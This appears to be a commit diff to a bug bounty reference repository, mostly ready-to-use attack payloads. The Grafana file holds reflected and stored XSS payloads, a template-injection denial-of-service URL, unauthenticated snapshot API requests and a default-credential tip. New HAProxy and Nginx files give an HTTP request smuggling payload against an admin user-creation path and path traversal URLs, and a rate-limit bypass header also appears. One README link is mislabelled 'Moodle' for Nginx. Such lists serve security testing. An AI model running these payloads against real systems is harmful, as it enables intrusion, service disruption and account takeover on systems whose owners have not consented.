STRLCPY/AllAboutBugBounty

■ ■ ■ ■ ■ ■

Bypass/Bypass Rate Limit.md Bypass/Bypass 429.md

1		-	# Bypass Rate Limit
	1	+	# 429 Rate limit Bypass
2	2		1. Try add some custom header
3	3		```
4	4		X-Forwarded-For : 127.0.0.1
		skipped 78 lines

■ ■ ■ ■ ■ ■

README.md

		skipped 24 lines
25	25		- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
26	26		- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
27	27		- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
	28	+	- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
28	29		- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
29		-	- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
30	30		- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
31	31
32	32		## List CMS
		skipped 14 lines
47	47		- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
48	48
49	49		## Technologies
	50	+	- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
	51	+	- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
50	52		- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
51	53		- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
52	54		- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
	55	+	- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
53	56
54	57		## Reconnaissance
55	58		- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
		skipped 6 lines

■ ■ ■ ■ ■ ■

Technologies/Grafana.md

1	1		# Grafana
2		-	1. CVE-2020-13379 (Denial of Service)
	2	+	1. CVE-2021-41174 (Reflected XSS)
	3	+	```
	4	+	<GRAFANA URL>/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
	5	+	```
	6	+	2. CVE-2020-13379 (Denial of Service)
3	7		```
4	8		<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
5	9		```
6		-	2. CVE-2020-11110 (Stored XSS)
	10	+	3. CVE-2020-11110 (Stored XSS)
7	11		```
8	12		POST /api/snapshots HTTP/1.1
9	13		Host: <GRAFANA URL>
		skipped 5 lines
15	19
16	20		{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
17	21		```
18		-	3. CVE-2019-15043 (Grafana Unauthenticated API)
	22	+	4. CVE-2019-15043 (Grafana Unauthenticated API)
19	23		```
20	24		POST /api/snapshots HTTP/1.1
21	25		Host: <GRAFANA URL>
		skipped 5 lines
27	31
28	32		{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
29	33		```
30		-	4. Default Credentials
	34	+	5. Default Credentials
31	35		```
32	36		Try to login using admin as username and password
33	37		```
34		-	5. Signup Enabled
	38	+	6. Signup Enabled
35	39		```
36	40		<GRAFANA URL>/signup
37	41		```

■ ■ ■ ■ ■ ■

Technologies/HAProxy.md

1	+	# HAProxy
2	+	1. CVE-2021-40346 (HTTP Request Smuggling)
3	+	```
4	+	POST /index.html HTTP/1.1
5	+	Host: abc.com
6	+	Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
7	+	Content-Length: 60
8	+
9	+	GET /admin/add_user.py HTTP/1.1
10	+	Host: abc.com
11	+	abc: xyz
12	+	```
13	+
14	+	Source:
15	+	- [JFrog](https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/)

■ ■ ■ ■ ■ ■

Technologies/Nginx.md

1	+	# Nginx
2	+
3	+	1. Directory traversal
4	+	```
5	+	https://example.com/folder1../folder1/folder2/static/main.css
6	+	https://example.com/folder1../%s/folder2/static/main.css
7	+	https://example.com/folder1/folder2../folder2/static/main.css
8	+	https://example.com/folder1/folder2../%s/static/main.css
9	+	https://example.com/folder1/folder2/static../static/main.css
10	+	https://example.com/folder1/folder2/static../%s/main.css
11	+	```

Add nginx & haproxy